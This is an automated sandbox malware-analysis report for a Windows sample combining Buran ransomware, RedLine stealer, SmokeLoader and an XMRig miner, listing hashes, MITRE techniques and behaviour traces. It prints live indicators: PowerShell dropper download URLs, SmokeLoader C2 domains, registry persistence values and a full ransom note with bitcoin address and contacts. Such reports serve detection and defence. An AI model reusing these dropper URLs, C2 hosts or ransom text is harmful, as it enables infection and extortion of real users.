buran | dff9da898a68e7e3f22e992e55d0b45cbe1625b9bf5f4a148e76fe0d6d654696

Analysis

max time kernel
146s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
29-08-2021 21:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

27923d58a1326ee7f05aea88dfd0ef09.exe
Size

140KB
MD5

27923d58a1326ee7f05aea88dfd0ef09
SHA1

cb807ea8b07f677dfacde25724ab02d1a4a99f72
SHA256

dff9da898a68e7e3f22e992e55d0b45cbe1625b9bf5f4a148e76fe0d6d654696
SHA512

fbadfd8293b00ccc8c8b6c6b7efdafcef125d67db5bcfb259b5fd5f1a1e897c24ef158f25adb9f41a95f2eb698571b7e17acb7b1e535f84345a7c9982bb83a51

Score

10^/10

buran redline smokeloader xmrig agilenet backdoor discovery infostealer miner persistence ransomware spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.zippyshare.cc/1630257393/download

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.zippyshare.cc/1630257468/download

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.zippyshare.cc/1630258463/download

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 590$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? [email protected] TELEGRAM @ payfast290 Your personal ID: 351-3D7-915 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

smokeloader

Version

2020

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

2242.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Twitch\\TwitchUpdate.exe\","	2242.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/472-279-0x0000000005420000-0x000000000547E000-memory.dmp	family_redline
behavioral2/memory/472-281-0x00000000059D0000-0x0000000005A2D000-memory.dmp	family_redline
behavioral2/memory/4424-413-0x000000000041C5A2-mapping.dmp	family_redline
behavioral2/memory/4424-423-0x0000000005120000-0x0000000005726000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5040-489-0x00000001402F327C-mapping.dmp	xmrig
behavioral2/memory/5040-493-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	Process
37	1568	powershell.exe
39	3852	powershell.exe
46	2248	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 18 IoCs

Processes:

E4B8.exeEF48.exeF42B.exeservices.exeservices.exe1C65.exeWindowsHost.exe2242.exeWindowsAPI.exesvhost.exeSafeWindows.exeDriverVideocard.exesvhost.exesvhost.exe2242.exesihost64.exe2242.exesihost32.exe

pid	Process
3820	E4B8.exe
508	EF48.exe
2220	F42B.exe
2676	services.exe
1056	services.exe
472	1C65.exe
1300	WindowsHost.exe
3544	2242.exe
4272	WindowsAPI.exe
4720	svhost.exe
4156	SafeWindows.exe
4280	DriverVideocard.exe
4576	svhost.exe
4424	svhost.exe
4648	2242.exe
4980	sihost64.exe
1300	2242.exe
4748	sihost32.exe

Deletes itself 1 IoCs

Processes:

pid	Process
3020

Obfuscated with Agile.Net obfuscator 4 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral2/files/0x000100000001ab47-349.dat	agile_net
behavioral2/files/0x000100000001ab47-356.dat	agile_net
behavioral2/files/0x000100000001ab47-411.dat	agile_net
behavioral2/files/0x000100000001ab47-414.dat	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

E4B8.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	E4B8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\services.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\services.exe\" -start"	E4B8.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

services.exe

description	ioc	Process
File opened (read-only)	\??\P:	services.exe
File opened (read-only)	\??\N:	services.exe
File opened (read-only)	\??\M:	services.exe
File opened (read-only)	\??\G:	services.exe
File opened (read-only)	\??\F:	services.exe
File opened (read-only)	\??\T:	services.exe
File opened (read-only)	\??\S:	services.exe
File opened (read-only)	\??\Q:	services.exe
File opened (read-only)	\??\J:	services.exe
File opened (read-only)	\??\B:	services.exe
File opened (read-only)	\??\A:	services.exe
File opened (read-only)	\??\L:	services.exe
File opened (read-only)	\??\K:	services.exe
File opened (read-only)	\??\H:	services.exe
File opened (read-only)	\??\E:	services.exe
File opened (read-only)	\??\Z:	services.exe
File opened (read-only)	\??\W:	services.exe
File opened (read-only)	\??\V:	services.exe
File opened (read-only)	\??\R:	services.exe
File opened (read-only)	\??\O:	services.exe
File opened (read-only)	\??\I:	services.exe
File opened (read-only)	\??\Y:	services.exe
File opened (read-only)	\??\X:	services.exe
File opened (read-only)	\??\U:	services.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
24	geoiptool.com
51	checkip.amazonaws.com

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

EF48.exe1C65.exe

pid	Process
508	EF48.exe
508	EF48.exe
472	1C65.exe
508	EF48.exe
508	EF48.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

27923d58a1326ee7f05aea88dfd0ef09.exesvhost.exe2242.exeSafeWindows.exe

description	pid	Process	procid_target
PID 992 set thread context of 2296	992	27923d58a1326ee7f05aea88dfd0ef09.exe	77
PID 4720 set thread context of 4424	4720	svhost.exe	136
PID 3544 set thread context of 4648	3544	2242.exe	139
PID 4156 set thread context of 5040	4156	SafeWindows.exe	147

Drops file in Program Files directory 64 IoCs

Processes:

services.exe

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OUTLFLTR.DAT	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\REFINED\REFINED.ELM.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac.payfast.351-3D7-915	services.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-125.png	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunjce_provider.jar	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\local_policy.jar.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MML2OMML.XSL.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteMediumTile.scale-100.png	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\common\King_Of_The_Hill_Unearned_small.png	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART7.BDR	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSYH.TTC	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ppd.xrm-ms.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\Sounds\Nudge.wma	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OneConnectAppList.targetsize-32.png	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\redshift.ini.payfast.351-3D7-915	services.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_contrast-black.png	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-phn.xrm-ms.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\security\java.policy	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription-ul-oob.xrm-ms.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\ExcelMessageDismissal.txt	services.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-ul-phn.xrm-ms.payfast.351-3D7-915	services.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f4\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_altform-unplated_contrast-black.png	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\sticker.png	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib	services.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Awards\Assets\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-pl.xrm-ms	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Grace-ppd.xrm-ms	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\3899_32x32x32.png	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ul-phn.xrm-ms	services.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac	services.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-24_contrast-black.png	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-80_altform-unplated.png	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	services.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Retail-ppd.xrm-ms	services.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-125_contrast-black.png	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Grace-ppd.xrm-ms	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7316_40x40x32.png	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\THMBNAIL.PNG.payfast.351-3D7-915	services.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Double Wave.png	services.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedSmallTile.scale-100.png	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.payfast.351-3D7-915	services.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\mscss7wre_en.dub	services.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\index.win32.stats.json	services.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-white\LargeTile.scale-125.png	services.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

27923d58a1326ee7f05aea88dfd0ef09.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	27923d58a1326ee7f05aea88dfd0ef09.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	27923d58a1326ee7f05aea88dfd0ef09.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	27923d58a1326ee7f05aea88dfd0ef09.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
4168	schtasks.exe
184	schtasks.exe
4940	schtasks.exe
4432	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
3712	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
4976	taskkill.exe

Modifies registry class 1 IoCs

Processes:

2242.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	2242.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

E4B8.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	E4B8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	E4B8.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

27923d58a1326ee7f05aea88dfd0ef09.exe

pid	Process
2296	27923d58a1326ee7f05aea88dfd0ef09.exe
2296	27923d58a1326ee7f05aea88dfd0ef09.exe
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
3020

Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

27923d58a1326ee7f05aea88dfd0ef09.exe

pid	Process
2296	27923d58a1326ee7f05aea88dfd0ef09.exe
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020
3020

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exevssvc.exeWMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeBackupPrivilege	2376	vssvc.exe
Token: SeRestorePrivilege	2376	vssvc.exe
Token: SeAuditPrivilege	2376	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3924	WMIC.exe
Token: SeSecurityPrivilege	3924	WMIC.exe
Token: SeTakeOwnershipPrivilege	3924	WMIC.exe
Token: SeLoadDriverPrivilege	3924	WMIC.exe
Token: SeSystemProfilePrivilege	3924	WMIC.exe
Token: SeSystemtimePrivilege	3924	WMIC.exe
Token: SeProfSingleProcessPrivilege	3924	WMIC.exe
Token: SeIncBasePriorityPrivilege	3924	WMIC.exe
Token: SeCreatePagefilePrivilege	3924	WMIC.exe
Token: SeBackupPrivilege	3924	WMIC.exe
Token: SeRestorePrivilege	3924	WMIC.exe
Token: SeShutdownPrivilege	3924	WMIC.exe
Token: SeDebugPrivilege	3924	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3924	WMIC.exe
Token: SeRemoteShutdownPrivilege	3924	WMIC.exe
Token: SeUndockPrivilege	3924	WMIC.exe
Token: SeManageVolumePrivilege	3924	WMIC.exe
Token: 33	3924	WMIC.exe
Token: 34	3924	WMIC.exe
Token: 35	3924	WMIC.exe
Token: 36	3924	WMIC.exe
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeShutdownPrivilege	3020
Token: SeCreatePagefilePrivilege	3020
Token: SeIncreaseQuotaPrivilege	3924	WMIC.exe
Token: SeSecurityPrivilege	3924	WMIC.exe
Token: SeTakeOwnershipPrivilege	3924	WMIC.exe
Token: SeLoadDriverPrivilege	3924	WMIC.exe
Token: SeSystemProfilePrivilege	3924	WMIC.exe
Token: SeSystemtimePrivilege	3924	WMIC.exe
Token: SeProfSingleProcessPrivilege	3924	WMIC.exe
Token: SeIncBasePriorityPrivilege	3924	WMIC.exe
Token: SeCreatePagefilePrivilege	3924	WMIC.exe
Token: SeBackupPrivilege	3924	WMIC.exe
Token: SeRestorePrivilege	3924	WMIC.exe
Token: SeShutdownPrivilege	3924	WMIC.exe
Token: SeDebugPrivilege	3924	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3924	WMIC.exe
Token: SeRemoteShutdownPrivilege	3924	WMIC.exe
Token: SeUndockPrivilege	3924	WMIC.exe
Token: SeManageVolumePrivilege	3924	WMIC.exe
Token: 33	3924	WMIC.exe
Token: 34	3924	WMIC.exe
Token: 35	3924	WMIC.exe
Token: 36	3924	WMIC.exe
Token: SeShutdownPrivilege	3020

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

EF48.exe

pid	Process
508	EF48.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid	Process
3020

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

27923d58a1326ee7f05aea88dfd0ef09.exeE4B8.exeF42B.execmd.exeservices.execmd.execmd.exepowershell.exe

description	pid	Process	procid_target
PID 992 wrote to memory of 2296	992	27923d58a1326ee7f05aea88dfd0ef09.exe	77
PID 992 wrote to memory of 2296	992	27923d58a1326ee7f05aea88dfd0ef09.exe	77
PID 992 wrote to memory of 2296	992	27923d58a1326ee7f05aea88dfd0ef09.exe	77
PID 992 wrote to memory of 2296	992	27923d58a1326ee7f05aea88dfd0ef09.exe	77
PID 992 wrote to memory of 2296	992	27923d58a1326ee7f05aea88dfd0ef09.exe	77
PID 992 wrote to memory of 2296	992	27923d58a1326ee7f05aea88dfd0ef09.exe	77
PID 3020 wrote to memory of 3820	3020		79
PID 3020 wrote to memory of 3820	3020		79
PID 3020 wrote to memory of 3820	3020		79
PID 3020 wrote to memory of 508	3020		80
PID 3020 wrote to memory of 508	3020		80
PID 3020 wrote to memory of 508	3020		80
PID 3020 wrote to memory of 2220	3020		82
PID 3020 wrote to memory of 2220	3020		82
PID 3820 wrote to memory of 2676	3820	E4B8.exe	83
PID 3820 wrote to memory of 2676	3820	E4B8.exe	83
PID 3820 wrote to memory of 2676	3820	E4B8.exe	83
PID 2220 wrote to memory of 3992	2220	F42B.exe	84
PID 2220 wrote to memory of 3992	2220	F42B.exe	84
PID 3992 wrote to memory of 1568	3992	cmd.exe	86
PID 3992 wrote to memory of 1568	3992	cmd.exe	86
PID 3992 wrote to memory of 3852	3992	cmd.exe	87
PID 3992 wrote to memory of 3852	3992	cmd.exe	87
PID 3992 wrote to memory of 2248	3992	cmd.exe	88
PID 3992 wrote to memory of 2248	3992	cmd.exe	88
